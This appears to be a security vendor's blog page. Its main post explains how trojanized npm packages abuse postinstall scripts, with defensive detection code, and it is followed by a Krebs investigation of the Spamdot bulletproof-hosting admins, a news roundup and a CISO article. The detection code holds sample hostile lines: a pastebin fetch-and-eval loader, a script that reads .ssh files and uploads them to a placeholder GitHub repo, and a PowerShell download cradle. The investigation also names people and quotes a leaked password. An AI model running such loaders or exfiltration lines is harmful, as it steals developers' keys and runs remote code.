Unseen Threats in Software Development | The Perils of Trojanized NPM Packages

Securing the supply chain against exploitation of package managers such as npm (Node Package Manager) is a challenge for many organizations. On the one hand, businesses want the productivity benefits that come from sourcing external code; on the other, they lack both control and visibility into how secure that code is. Many organizations rely on developers to know whether code dependencies are secure or not, but that is not always the case, particularly as few developers have the expertise or time to manage security issues.

In this post, we explain how NPM is used in the enterprise and highlight how threat actors can readily exploit npm to attack businesses that have yet to set up the appropriate safeguards and controls for this vector.

What is NPM?

Short for Node Package Manager, npm is a package manager for JavaScript and the default package manager shipped with the Node.js runtime. NPM essentially consists of:

  • NPM Command Line Interface (CLI) tool – the CLI is the primary means of installing, updating and managing NPM dependencies in JavaScript projects.
  • NPM Registry – an online database hosting well over a million public packages, alongside private packages scoped to individual organizations.

NPM is widely used in the enterprise for a number of reasons. First, it makes it simple for developers to share code either publicly or privately within a team, department or organization. In addition, like other code libraries, having a vast store of open-source packages allows developers to leverage existing code for common problems, improving productivity and preventing a ‘reinvent the wheel’ scenario on every new project. Moreover, adopting npm simplifies dependency management and supports both version control and automation into CI/CD pipelines.

Because npm and npm packages can extend deep into the organization’s development environment, security is a crucial issue that must be addressed. Let’s look at some examples of how easily, and severely, npm can be leveraged by threat actors.

The Targeting of npm for Exploitation

npm’s widespread use and the ease of publishing to it, particularly where DevOps teams have less stringent security practices, make it an attractive target for attackers. The recent ‘everything’ incident serves as a case study in how npm’s dependency structure can be used for broader, more malicious objectives, including supply-chain style attacks with far-reaching impact.

An npm user published a package named ‘everything’ which, as part of a troll campaign, declared a dependency on every other public npm package. Anyone who installed it faced storage space exhaustion and disrupted build pipelines, effectively a Denial of Service (DoS).

While this incident was an isolated prank, it brings to light deeper vulnerabilities within npm, especially regarding the exploitation of postinstall scripts.

Understanding npm and Its Components

At its core, an npm package is a directory of JavaScript modules plus supporting files such as documentation and examples. What npm installs and runs is controlled by the package.json manifest, which holds the package metadata, its dependency list and a scripts map. Three of those scripts, preinstall, install and postinstall, are executed automatically by npm when the package is installed as a dependency; they require no action from the consumer beyond running the install.

Typically, the main field in package.json points to an entry file such as index.js in the package’s root directory, which determines what is exported when another project calls require() on the package. On its own, main does nothing at install time: that file only runs when something loads it.

Crucially, a specially-crafted package can pair a postinstall entry that simply invokes node on index.js with a malicious index.js, so that the attacker’s code runs at the moment of installation, before the consumer has written a single line that uses the package.

Exploiting npm | The ‘Postinstall’ Script Vulnerability

In the following scenario, we imitate a threat actor uploading a malicious NPM package to the npm public library and staging further attack code on pastebin. The attack, if successful, exfiltrates business data to a public GitHub repository. Attackers choose public sites like pastebin and GitHub in the hope that the traffic will seem legitimate and, given that most organizations will indeed have much legitimate traffic to these sites, be easily hidden in the ‘noise’.

In order for the attack to be successful, the attacker must convince the developer to include the malicious package in their own work. This is commonly achieved through various means such as typosquatting, social engineering and poisoned website attacks.

Our proof-of-concept attack involves a maliciously crafted npm package that includes code in the index.js to call out to a public paste site (pastebin.com) where it will read the provided node.js code, and then transparently execute that code in the context of the user installing the package.

Our example pulls a dummy file from the .ssh folder in the installing user’s home directory (shown as %HOMEDIR%.ssh in the screenshots). In an actual attack, threat actors could steal real SSH key pairs, or siphon up whatever else is available.

Contents of index.js pointing to pastebin.com

This particular attack scenario declares the axios package as a dependency of the trojanized package, so npm fetches it alongside. Axios is a common JavaScript library used to create and manipulate HTTP requests, and it is so widely used in enterprise environments that its appearance in a dependency tree draws little attention.

Example of malicious code hosted on a public paste site

In the pasted code, we have additional node.js code which gathers the requested data and then exfiltrates it to a GitHub repository. In this case, the script locates our dummy file, named “meow” and located in %HOMEDIR%.ssh. It then uploads the contents of that file to the root of the GitHub repository. Authentication is handled via a temporary GitHub personal access token.

With these components in place, the trojanized npm package is published to the public npm registry. Once a ‘consumer’ installs the package, npm runs the postinstall script, index.js executes, fetches and evaluates the staged code, and the victim’s data is uploaded.
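The pattern described above (an auto-run lifecycle script, an entry file that fetches code from a public paste site and evaluates it, and a staged second stage that reads SSH material and pushes it to GitHub) can be flagged statically before a package is ever installed. The following is an added example written for this page, not code from the original post: a small audit that reads a parsed package.json plus the package’s source files, lists the scripts npm would run on install, and scans the files those scripts invoke for the indicators the post describes. The package contents, the pastebin and GitHub URLs, and the token are constructed placeholders.

```javascript
// Added example, not code from the original post: a static audit that flags the
// install-time execution pattern described above. All package data below is
// constructed for the example; the pastebin/GitHub URLs and token are placeholders.

// Scripts npm runs on its own when a package is installed. preinstall/install/
// postinstall run for dependencies; prepare runs for git deps and local installs.
const AUTO_RUN_SCRIPTS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic indicators. Each on its own has benign uses; the combination with an
// auto-run lifecycle script is what makes the package worth a human look.
const INDICATORS = [
  { id: 'remote-code-exec', re: /\b(eval|new\s+Function)\s*\(|vm\.run(In(New|This)Context|InContext)\(/ },
  { id: 'public-staging-host', re: /https?:\/\/(pastebin\.com|raw\.githubusercontent\.com|gist\.github\.com|api\.github\.com)/i },
  { id: 'child-process', re: /\bchild_process\b|\b(exec|spawn|execFile)(Sync)?\s*\(/ },
  { id: 'powershell', re: /\bpowershell(\.exe)?\b/i },
  { id: 'ssh-material', re: /\.ssh\b|\bid_(rsa|ed25519|ecdsa)\b/ },
  { id: 'home-dir', re: /os\.homedir\(\)|%USERPROFILE%|\$HOME\b|\bHOMEDIR\b/ },
];

// Return the indicator ids that fire on one piece of source text.
function scanSource(src) {
  return INDICATORS.filter((ind) => ind.re.test(src)).map((ind) => ind.id);
}

// File names a shell command like "node index.js && node setup.mjs" would run.
function scriptTargets(cmd) {
  return cmd.match(/[\w.\/-]+\.[cm]?js\b/g) || [];
}

// pkg = { packageJson: <parsed package.json>, files: { 'index.js': '<source>' } }
function auditNpmPackage(pkg) {
  const scripts = pkg.packageJson.scripts || {};
  const lifecycle = AUTO_RUN_SCRIPTS.filter((name) => name in scripts);
  const findings = [];
  const filesToScan = new Set();
  for (const name of lifecycle) {
    // The command line itself can carry the payload (e.g. curl | sh), so scan it too.
    for (const id of scanSource(scripts[name])) findings.push({ where: `scripts.${name}`, indicator: id });
    for (const f of scriptTargets(scripts[name])) filesToScan.add(f);
  }
  for (const f of filesToScan) {
    const src = pkg.files[f];
    if (src === undefined) { findings.push({ where: f, indicator: 'missing-file' }); continue; }
    for (const id of scanSource(src)) findings.push({ where: f, indicator: id });
  }
  // Any auto-run script deserves a look; one that also trips an indicator is high.
  const risk = lifecycle.length === 0 ? 'low' : findings.length === 0 ? 'medium' : 'high';
  return { name: pkg.packageJson.name, lifecycle, findings, risk };
}

// Constructed sample: the shape of the trojanized package described in the post.
const TROJANIZED = {
  packageJson: {
    name: 'example-typosquat', version: '1.0.3',
    dependencies: { axios: '^1.6.0' },           // pulled in with the package
    scripts: { postinstall: 'node index.js' },   // the hook that runs on install
  },
  files: {
    'index.js': [
      "const axios = require('axios');",
      "// placeholder URL standing in for the staged second stage",
      "axios.get('https://pastebin.com/raw/EXAMPLE').then((r) => eval(r.data));",
    ].join('\n'),
  },
};

// Constructed sample of what the staged second stage looks like: reads a file
// from the user's .ssh directory and pushes it to a GitHub repo with a token.
const SECOND_STAGE = [
  "const fs = require('fs'), os = require('os'), path = require('path');",
  "const data = fs.readFileSync(path.join(os.homedir(), '.ssh', 'meow'));",
  "axios.put('https://api.github.com/repos/EXAMPLE/EXAMPLE/contents/meow',",
  "  { message: 'x', content: data.toString('base64') },",
  "  { headers: { Authorization: 'token REDACTED' } });",
].join('\n');

// Constructed benign package: no auto-run scripts at all.
const BENIGN = {
  packageJson: { name: 'tiny-trim', version: '2.0.0', scripts: { test: 'node test.js' } },
  files: { 'index.js': 'module.exports = (s) => s.trim();' },
};

console.log(JSON.stringify(auditNpmPackage(TROJANIZED), null, 2));
console.log('second stage indicators:', scanSource(SECOND_STAGE));
console.log(JSON.stringify(auditNpmPackage(BENIGN)));
```

Run it with node to see the trojanized sample come back as high risk (postinstall hook plus eval of content fetched from a paste host), the staged second stage trip the public-host, .ssh and home-directory indicators, and the benign package come back low. A package with an install script but no indicators (a native build step, for instance) lands at medium, which is the right answer: it should be vetted, not blocked outright. The indicators are deliberately coarse; in practice this runs over the extracted tarball of every new dependency in CI, and a medium or high result gates the merge until someone reads the script.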

Executing Malicious Programs Through ‘Postinstall’

This method leverages postinstall scripts to run harmful programs like Mimikatz. The scripts execute with the privileges of whichever user or CI runner invokes npm install, which presents a significant security risk.

To spread the attack out we are including GitHub again, but this time as the source for our Mimikatz PowerShell one-liner. We are also staging our code again on a public paste site.

Upon installation of our trojanized npm package, the index.js file will reference the attacker code saved on the public paste site.

Staged code on paste site referencing a Mimikatz one-liner

This code will be interpreted, resulting in the execution of a PowerShell command, which downloads and executes Mimikatz from a public GitHub repository.

Strengthening npm Security

Attack scenarios like these and pranks like the ‘everything’ package highlight how easily npm’s system can be manipulated. Context is king in detecting these types of threats, and the indicators of attack are spread across the malicious code and network realms.

PowerShell execution of Mimikatz by-way-of-node.exe

Countering and mitigating these threats requires controls for both staging and exfiltration: monitoring and alerting on associated traffic, DNS requests and connections to associated IP addresses, and on unusual child processes of node such as PowerShell. On the install side, running npm with the ignore-scripts setting enabled stops lifecycle scripts from executing at all (packages that genuinely need an install step can then be vetted and built explicitly), and committing a lockfile keeps the resolved dependency set from drifting between installs. A modern security platform with the ability to autonomously detect malicious behavior remains an enterprise security essential.
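The process lineage in the screenshot above, node.exe spawning PowerShell which then pulls a payload from a public code host, is the endpoint-side indicator worth alerting on. The following is an added example written for this page, not part of the original post: a detection pass over process-creation events that requires a script host (node, npm, npx) as the parent of a shell, then scores the command line for a download cradle, an encoded command, a public staging host and the usual evasion flags. The event records and their field names (parent_image, image, command_line, pid) are constructed assumptions about the telemetry schema and would be mapped onto your EDR or Sysmon fields; the GitHub URL and the base64 blob are placeholders.

```javascript
// Added example, not from the original post: scoring endpoint process events for
// the npm -> node.exe -> powershell.exe -> public-host chain described above.
// Sample events are constructed; field names are an assumed telemetry schema.

const SCRIPT_HOSTS = /^(node|npm|npx)(\.exe|\.cmd)?$/i;
const SHELLS = /^(powershell|pwsh|cmd|bash|sh)(\.exe)?$/i;
const DOWNLOAD_CRADLE = /(DownloadString|DownloadFile|Invoke-WebRequest|iwr|Invoke-Expression|IEX|curl|wget)\b/i;
const ENCODED = /(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+\/=]{20,}/i;
const PUBLIC_STAGING = /(pastebin\.com|raw\.githubusercontent\.com|gist\.github\.com)/i;
const EVASION_FLAGS = /-(nop|noprofile|w(indowstyle)?\s+hidden|ep|executionpolicy)\b/i;

function baseName(p) {
  return p.split(/[\\\/]/).pop();
}

// Returns null when the lineage does not match; otherwise an alert with reasons.
// A script host spawning a shell on its own is only "low": build tooling such as
// node-gyp legitimately does it, so severity rises with the command-line findings.
function scoreEvent(ev) {
  const parent = baseName(ev.parent_image || '');
  const image = baseName(ev.image || '');
  if (!(SCRIPT_HOSTS.test(parent) && SHELLS.test(image))) return null;
  const reasons = [`${parent} spawned ${image}`];
  const cl = ev.command_line || '';
  if (DOWNLOAD_CRADLE.test(cl)) reasons.push('download/execute cradle');
  if (ENCODED.test(cl)) reasons.push('encoded command');
  if (PUBLIC_STAGING.test(cl)) reasons.push('public staging host');
  if (EVASION_FLAGS.test(cl)) reasons.push('evasion flags');
  const severity = reasons.length >= 3 ? 'high' : reasons.length === 2 ? 'medium' : 'low';
  return { pid: ev.pid, severity, reasons };
}

function detect(events) {
  return events.map(scoreEvent).filter(Boolean);
}

// Constructed sample telemetry. Event 1 mirrors the post's Mimikatz stage,
// 2 is a normal native build, 3 is an unrelated interactive shell, 4 is an
// encoded command with nothing else visible.
const SAMPLE_EVENTS = [
  { pid: 4120, parent_image: 'C:\\Program Files\\nodejs\\node.exe',
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    command_line: "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
      + ".DownloadString('https://raw.githubusercontent.com/EXAMPLE/EXAMPLE/main/stage.ps1')\"" },
  { pid: 4133, parent_image: 'C:\\Program Files\\nodejs\\node.exe',
    image: 'C:\\Windows\\System32\\cmd.exe',
    command_line: 'cmd.exe /d /s /c "node-gyp rebuild"' },
  { pid: 4150, parent_image: 'C:\\Windows\\explorer.exe',
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    command_line: 'powershell.exe -c Get-Process' },
  { pid: 4161, parent_image: 'C:\\Program Files\\nodejs\\node.exe',
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    command_line: 'powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA' },
];

for (const alert of detect(SAMPLE_EVENTS)) {
  console.log(`pid ${alert.pid}: ${alert.severity} - ${alert.reasons.join('; ')}`);
}
```

On the sample, the Mimikatz-style event scores high on all four command-line checks, the node-gyp build is reported but only as low, the explorer-launched shell is ignored because the lineage does not match, and the bare encoded command lands at medium. Pair this with the network side the post mentions (node.exe or its children resolving pastebin.com or raw.githubusercontent.com during an install) and the two halves corroborate each other.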

Conclusion

Threat actors are constantly looking for more robust distribution mechanisms for malware and other malicious attack components. The use of npm packages as a vector is attractive to threat actors for a variety of reasons, including wide reach and ease of prolonged access.

Such attack surfaces underscore the necessity of fortifying npm against exploitation, particularly through ‘postinstall’ scripts. This requires not just reactive measures but also proactive strategies including comprehensive monitoring, traffic analysis, and the deployment of advanced security platforms. Ensuring the security of npm is crucial for maintaining its role as a trusted tool in the software development community.

To learn more about how SentinelOne can help protect your organization from these and other threats, contact us or request a free demo.

Meet Ika & Sal: The Bulletproof Hosting Duo from Hell

In 2020, the United States brought charges against four men accused of building a bulletproof hosting empire that once dominated the Russian cybercrime industry and supported multiple organized cybercrime groups. All four pleaded guilty to conspiracy and racketeering charges. But there is a fascinating and untold backstory behind the two Russian men involved, who co-ran the world’s top spam forum and worked closely with Russia’s most dangerous cybercriminals.

From January 2005 to April 2013, there were two primary administrators of the cybercrime forum Spamdot (a.k.a. Spamit), an invite-only community for Russian-speaking people in the businesses of sending spam and building botnets of infected computers to relay said spam. The Spamdot admins went by the nicknames Icamis (a.k.a. Ika), and Salomon (a.k.a. Sal).

Spamdot forum administrator “Ika” a.k.a. “Icamis” responds to a message from “Tarelka,” the botmaster behind the Rustock botnet. Dmsell said: “I’m actually very glad that I switched to legal spam mailing,” prompting Tarelka and Ika to scoff.

As detailed in my 2014 book, Spam Nation, Spamdot was home to crooks controlling some of the world’s nastiest botnets, global malware contagions that went by exotic names like Rustock, Cutwail, Mega-D, Festi, Waledac, and Grum.

Icamis and Sal were in daily communications with these botmasters, via the Spamdot forum and private messages. Collectively in control over millions of spam-spewing zombies, those botmasters also continuously harvested passwords and other data from infected machines.

As we’ll see in a moment, Salomon is now behind bars, in part because he helped to rob dozens of small businesses in the United States using some of those same harvested passwords. He is currently housed in a federal prison in Michigan, serving the final stretch of a 60-month sentence.

But the identity and whereabouts of Icamis have remained a mystery to this author until recently. For years, security experts — and indeed, many top cybercriminals in the Spamit affiliate program — have expressed the belief that Sal and Icamis were likely the same person using two different identities. And there were many good reasons to support this conclusion.

For example, in 2010 Spamdot and its spam affiliate program Spamit were hacked, and its user database shows Sal and Icamis often accessed the forum from the same Internet address — usually from Cherepovets, an industrial town situated approximately 230 miles north of Moscow. Also, it was common for Icamis to reply when Spamdot members communicated a request or complaint to Sal, and vice versa.

Image: maps.google.com

Still, other clues suggested Icamis and Sal were two separate individuals. For starters, they frequently changed the status on their instant messenger clients at different times. Also, they each privately discussed with others having attended different universities.

KrebsOnSecurity began researching Icamis’s real-life identity in 2012, but failed to revisit any of that research until recently. In December 2023, KrebsOnSecurity published new details about the identity of “Rescator,” a Russian cybercriminal who is thought to be closely connected to the 2013 data breach at Target.

That story mentioned Rescator’s real-life identity was exposed by Icamis in April 2013, as part of a lengthy farewell letter Ika wrote to Spamdot members wherein Ika said he was closing the forum and quitting the cybercrime business entirely.

To no one’s shock, Icamis didn’t quit the business: He simply became more quiet and circumspect about his work, which increasingly was focused on helping crime groups siphon funds from U.S. bank accounts. But the Rescator story was a reminder that 10 years worth of research on who Ika/Icamis is in real life had been completely set aside. This post is an attempt to remedy that omission.

The farewell post from Ika (aka Icamis), the administrator of both the BlackSEO forum and Pustota, the successor forum to Spamit/Spamdot.

GENTLEMEN SCAMMERS

Icamis and Sal offered a comprehensive package of goods and services that any aspiring or accomplished spammer would need on a day-to-day basis: Virtually unlimited bulletproof domain registration and hosting services, as well as services that helped botmasters evade spam block lists generated by anti-spam groups like Spamhaus.org. Here’s a snippet of Icamis’s ad on Spamdot from Aug. 2008, wherein he addresses forum members with the salutation, “Hello Gentlemen Scammers.”

We are glad to present you our services!
Many are already aware (and are our clients), but publicity is never superfluous. 🙂

Domains.
– all major gtlds (com, net, org, info, biz)
– many interesting and uninteresting cctlds
– options for any topic
– processing of any quantities
– guarantees
– exceptionally low prices for domains for white and gray schemes (including any SEO and affiliate spam)
– control panel with balances and auto-registration
– all services under the Ikamis brand, proven over the years;)

Servers.
– long-term partnerships with several [data centers] in several parts of the world for any topic
– your own data center (no longer in Russia ;)) for gray and white topics
– any configuration and any hardware
– your own IP networks (PI, not PA) and full legal support
– realtime backups to neutral sites
– guarantees and full responsibility for the services provided
– non-standard equipment on request
– our own admins to resolve any technical issues (services are free for clients)
– hosting (shared and vps) is also possible

Non-standard and related services.
– ssl certificates signed by geotrust and thawte
– old domains (any year, any quantity)
– beautiful domains (keyword, short, etc.)
– domains with indicators (any, for SEO, etc.)
– making unstable gtld domains stable
– interception and hijacking of custom domains (expensive)
– full domain posting via web.archive.org with restoration of native content (preliminary applications)
– any updates to our panels to suit your needs upon request (our own coders)

All orders for the “Domains” sections and “Servers” are carried out during the day (depending on our workload).
For non-standard and related services, a preliminary application is required 30 days in advance (except for ssl certificates – within 24 hours).

Icamis and Sal frequently claimed that their service kept Spamhaus and other anti-spam groups several steps behind their operations. But it’s clear that those anti-spam operations had a real and painful impact on spam revenues, and Salomon was obsessed with striking back at anti-spam groups, particularly Spamhaus.

In 2007, Salomon collected more than $3,000 from botmasters affiliated with competing spam affiliate programs that wanted to see Spamhaus suffer, and the money was used to fund a week-long distributed denial-of-service (DDoS) attack against Spamhaus and its online infrastructure. But rather than divert their spam botnets from their normal activity and thereby decrease sales, the botmasters voted to create a new DDoS botnet by purchasing installations of DDoS malware on thousands of already-hacked PCs (at a rate of $25 per 1,000 installs).

SALOMON

As an affiliate of Spamdot, Salomon used the email address ad1@safe-mail.net, and the password 19871987gr. The breach tracking service Constella Intelligence found the password 19871987gr was used by the email address grichishkin@gmail.com. Multiple accounts are registered to that email address under the name Alexander Valerievich Grichishkin, from Cherepovets.

In 2020, Grichishkin was arrested outside of Russia on a warrant for providing bulletproof hosting services to cybercriminal gangs. The U.S. government said Grichishkin and three others set up the infrastructure used by cybercriminals between 2009 to 2015 to distribute malware and attack financial institutions and victims throughout the United States.

Those clients included crooks using malware like Zeus, SpyEye, Citadel and the Blackhole exploit kit to build botnets and steal banking credentials.

“The Organization and its members helped their clients to access computers without authorization, steal financial information (including banking credentials), and initiate unauthorized wire transfers from victims’ financial accounts,” the government’s complaint stated.

Grichishkin pleaded guilty to conspiracy charges and was sentenced to four years in prison. He is 36 years old, has a wife and kids in Thailand, and is slated for release on February 8, 2024.

ICAMIS, THE PHANTOM GRADUATE

The identity of Icamis came into view when KrebsOnSecurity began focusing on clues that might connect Icamis to Cherepovets (Ika’s apparent hometown based on the Internet addresses he regularly used to access Spamdot).

Historic domain ownership records from DomainTools.com reveal that many of the email addresses and domains connected to Icamis invoke the name “Andrew Artz,” including icamis[.]ws, icamis[.]ru, and icamis[.]biz. Icamis promoted his services in 2003 — such as bulk-domains[.]info — using the email address icamis@4host.info. From one of his ads in 2005:

Domains For Projects Advertised By Spam

I can register bulletproof domains for sites and projects advertised by spam(of course they must be legal). I can not provide DNS for u, only domains. The price will be:

65$ for domain[if u will buy less than 5 domains]

50$ for domain[more than 5 domains]

45$ for domain[more than 10 domains]

These prices are for domains in the .net & .com zones.

If u want to order domains write me to: icamis@4host.info

In 2009, an “Andrew Artz” registered at the hosting service FirstVDS.com using the email address icamis@4host.info, with a notation saying the company name attached to the account was “WMPay.” Likewise, the bulletproof domain service icamis[.]ws was registered to an Andrew Artz.

The domain wmpay.ru is registered to the phonetically similar name “Andrew Hertz,” at andrew@wmpay.ru. A search on “icamis.ru” in Google brings up a 2003 post by him on a discussion forum designed by and for students of Amtek, a secondary school in Cherepovets (Icamis was commenting from an Internet address in Cherepovets).

The website amtek-foreva-narod.ru is still online, and it links to several yearbooks for Amtek graduates. It states that the yearbook for the Amtek class of 2004 is hosted at 41.wmpay[.]com.

The yearbook photos for the Amtek class of 2004 are not indexed in the Wayback Machine at archive.org, but the names and nicknames of 16 students remain. However, it appears that the entry for one student — the Wmpay[.]com site administrator — was removed at some point.

In 2004, the administrator of the Amtek discussion forum — a 2003 graduate who used the handle “Grand” — observed that there were three people named Andrey who graduated from Amtek in 2004, but one of them was conspicuously absent from the yearbook at wmpay[.]ru: Andrey Skvortsov.

To bring this full circle, Icamis was Andrey Skvortsov, the other Russian man charged alongside Grichishkin (the two others who pleaded guilty to conspiracy charges were from Estonia and Lithuania). All of the defendants in that case pleaded guilty to conspiracy to engage in a Racketeer Influenced and Corrupt Organizations (RICO) offense.

[Author’s note: No doubt government prosecutors had their own reasons for omitting the nicknames of the defendants in their press releases, but that information sure would have saved me a lot of time and effort].

SKVORTSOV AND THE JABBERZEUS CREW

Skvortsov was sentenced to time served, and presumably deported. His current whereabouts are unknown and he was not reachable for comment via his known contact addresses.

The government says Ika and Sal’s bulletproof hosting empire provided extensive support for a highly damaging cybercrime group known as the JabberZeus Crew, which worked closely with the author of the Zeus Trojan — Evgeniy Mikhailovich Bogachev — to develop a then-advanced strain of the Zeus malware that was designed to defeat one-time codes for authentication. Bogachev is a top Russian cybercriminal with a standing $3 million bounty on his head from the FBI.

The JabberZeus Crew stole money by constantly recruiting money mules, people in the United States and in Europe who could be enticed or tricked into forwarding money stolen from cybercrime victims. Interestingly, Icamis’s various email addresses are connected to websites for a vast network of phony technology companies that claimed they needed people with bank accounts to help pay their overseas employees.

Icamis used the email address tech@safe-mail.net on Spamdot, and this email address is tied to the registration records for multiple phony technology companies that were set up to recruit money mules.

One such site — sun-technology[.]net — advertised itself as a Hong Kong-based electronics firm that was looking for “honest, responsible and motivated people in UK, USA, AU and NZ to be Sales Representatives in your particular region and receive payments from our clients. Agent commission is 5 percent of total amount received to the personal bank account. You may use your existing bank account or open a new one for these purposes.”

In January 2010, KrebsOnSecurity broke the news that the JabberZeus crew had just used money mules to steal $500,000 from tiny Duanesburg Central School District in upstate New York. As part of his sentence, Skvortsov was ordered to pay $497,200 in restitution to the Duanesburg Central School District.

The JabberZeus Crew operated mainly out of the eastern Ukrainian city of Donetsk, which was always pro-Russia and is now occupied by Russian forces. But when Russia invaded Ukraine in February 2022, the alleged leader of the notorious cybercrime gang — Vyacheslav Igoravich Andreev (a.k.a. Penchukov) — fled his mandatory military service orders and was arrested in Geneva, Switzerland. He is currently in federal custody awaiting trial, and is slated to be arraigned in U.S. federal court tomorrow (Jan. 9, 2024). A copy of the indictment against Andreev is here (PDF).

Andreev, aka “Tank,” seen here performing as a DJ in Ukraine in an undated photo from social media.

The Good, the Bad and the Ugly in Cybersecurity – Week 1

The Good | Charity Scammer Indicted For Defrauding $7.5 Million Through BEC Attacks

The philanthropic world saw justice this past week with the arrest of Olusegun Samson Adejorin, a Nigerian national charged with stealing $7.5 million through business email compromise scams. The attacks targeted two U.S.-based charitable organizations and have led to an eight-count federal grand jury indictment, encompassing wire fraud, aggravated identity theft, and unauthorized access to a protected computer.

Adejorin’s fraudulent activities reportedly unfolded between June and August 2020 through an elaborate scheme involving unauthorized access to email accounts and the impersonation of employees to perpetrate the embezzlement. To facilitate withdrawals exceeding $10,000, Adejorin leveraged stolen credentials to send emails masquerading as legitimate employees who had the authority to approve such transactions. The DoJ revealed that he also acquired a credential harvesting tool, registered deceptive domain names, and concealed fraudulent emails within a legitimate employee’s mailbox to carry out the fraud.

The charges brought against Adejorin carry severe penalties, including a maximum of 20 years for wire fraud, five years for unauthorized access to a protected computer, and a mandatory two-year sentence for aggravated identity theft.

Business email compromise (BEC), of which CEO fraud is the best-known variant, has been a significant source of financial losses, with the FBI reporting billions of dollars in damages. To bolster defenses against such attacks, organizations are advised to implement measures such as multi-factor authentication (MFA), email filtering to detect and block phishing attempts, and robust verification procedures for wire transfer requests. Responding to suspicious requests, such as changes in bank account details, with a confirmation call to a predetermined number can serve as a crucial defense mechanism, potentially saving enterprises millions.

The Bad | Zeppelin Ransomware Source Code Found Listed On Cybercrime Forum For $500

Like the post-holiday sales that have trickled into the new year, dark markets and underground channels also continue to offer sales and promotions on malware kits, tools, and illicit services. Most recently, a threat actor known as ‘RET’ advertised the sale of Zeppelin ransomware builder’s source code and a cracked version for a mere $500 in a cybercrime forum.

Source: KELA Cyber Threat Intelligence

Originating from the Vega malware family, Zeppelin was active from 2019 to 2022, focusing on double extortion attacks to demand substantial ransoms from their victims. Zeppelin operators targeted a wide range of businesses and critical sectors including defense contractors, educational institutions, manufacturers, tech companies, and those in the healthcare field. According to the FBI and CISA, Zeppelin operators would execute their malware multiple times within a single compromised network, meaning victims would need several unique decryption keys to resume operations.

When law enforcement and security researchers identified exploitable flaws in Zeppelin’s encryption scheme back in November 2022, a decrypter was developed to assist affected victims, eventually leading to the discontinuation of the RaaS infrastructure. RET has reportedly asserted that the posted builder source code and cracked version up for sale is no longer susceptible to the same cryptographic weakness.

Although the authenticity remains unverified, threat intelligence researchers have acquired screenshots suggesting the legitimacy of the offer. Prospective buyers could utilize the package to establish a new ransomware-as-a-service (RaaS) operation or create a customized locker based on the Zeppelin family. RET, clarifying they did not create the malware but only managed to “crack the builder”, insisted on selling to a single buyer, temporarily halting the sale pending completion of the transaction.

The Ugly | Concern Over NPM Dependency System Sparked by Troublesome Holiday Prank

An online prank over the holidays by an NPM author has caused a wave of issues this week, disrupting build pipelines and exhausting storage space for any who installed a package called ‘everything’. Its namesake is an apt one: the ‘everything’ package systematically fetches every NPM package ever published to npmjs.com when downloaded.

Significant consequences followed the prank. The author published over 3,000 sub-packages to the registry, and between them those packages listed every NPM package on npmjs.com as a dependency. For other authors, this meant they were suddenly prevented from removing or unpublishing their own packages: NPM’s unpublish policy blocks removal of any package that other packages depend on, and now every package had a dependent.

Source: BleepingComputer

The NPM package registry is a cornerstone for the global software development community, providing an extensive collection of JavaScript packages and tools. With millions of packages available, developers worldwide use NPM for collaboration, accelerating development cycles, and ensuring code reliability.

GitHub has since addressed issues arising from the ‘everything’ package, allowing packages to be removed if they meet the company’s unpublish criteria. As of this writing, the company has also confirmed that the ‘everything’ repository has been removed from GitHub and that the package itself now carries a warning message on the NPM registry, where it remains.

The incident has sparked various reactions from developers facing challenges in unpublishing deprecated or experimental packages. While some deemed the stunt an exploitation of the open-source NPM system, others have highlighted its potential for malicious use such as denial of service (DoS) attacks.

The Changing Role of the CISO in 2024 | Navigating New Frontiers in Cybersecurity

As 2024 begins to unfold, the role of Chief Information Security Officers (CISOs) is set to evolve as modern enterprises face new challenges in the ever-changing cybersecurity landscape. Once primarily focused on implementing security protocols and conducting periodic risk assessments, CISOs are now expected to be key decision makers, influencing corporate strategy and guiding their organization through the complexities of the current age.

The evolution of the CISO is not only a response to the growing sophistication of cyber threats but also a proactive measure to stay ahead of potential risks. This blog post delves into the evolving role of the modern CISO, from figures of security technical know-how to pivotal visionaries in strategic cybersecurity and business growth.

Changing With the Times | From Technical Gurus to Strategic & Front-Line Leaders

When the role of “chief information security officer” first came into being – recall the role didn’t exist before 1995 – the responsibilities of the CISO were centered around establishing and maintaining security protocols. Those in the role needed deep technical know-how in both networking and operating systems, including experience in implementing firewalls, conducting periodic risk assessments, and ensuring compliance with relevant regulations. The CISO served as a technical gatekeeper, responding to emerging threats as they surfaced.

Over time, as the cyber threat landscape continued to evolve, the CISO’s responsibilities expanded, with increasing involvement in policy development, risk management, and collaborating with other C-level executives to align cybersecurity strategies with broader business objectives.

The Changing Role of the CISO | Establishing Cybersecurity at the Executive Level and Beyond

Although the role of the CISO now can vary widely across organizations depending on their size and nature, it tends to lean much further into executive leadership and risk management, with a prime responsibility to keep C-suites in touch with security risks relating to organizational objectives, strategy and business outcomes.

Depending on the organization, the modern CISO will be involved in most of the following key areas of responsibility to some degree or another.

  • Cyber risk management
  • Compliance and regulatory adoption
  • Strategic business integration
  • Crisis management & Incident Response
  • Establishing & cultivating a ‘Security First’ business culture

Let’s take a look at each of these in turn.

Cyber Risk Management

Central to the role of many CISOs is the responsibility for adopting a proactive and strategic approach to identify, assess, and mitigate cyber risks. This often includes developing comprehensive risk management frameworks that align with organizational goals.

Engaging actively with executive leadership, CISOs work to articulate the potential impact of cyber threats on business operations, financial stability, and company branding, collaborating where needed with department leads across the organization to foster a culture of cybersecurity awareness and compliance.

Compliance and Regulatory Adoption

CISOs play a central role in ensuring regulatory compliance, which involves both ensuring adherence and understanding the implications of regulations on day-to-day processes and overarching strategies.

Staying knowledgeable of regulatory changes and translating them into actionable policies is a shared responsibility that CISOs undertake to safeguard data privacy and integrity.

In collaboration with legal and compliance experts, CISOs navigate the intricate frameworks of requirements and controls set by GDPR, HIPAA, or PCI DSS, for example, and then tailor security measures to meet these standards. In addition, CISOs are counted on to cultivate a culture of continuous compliance through measures such as conducting regular audits and establishing mechanisms to identify and address gaps.

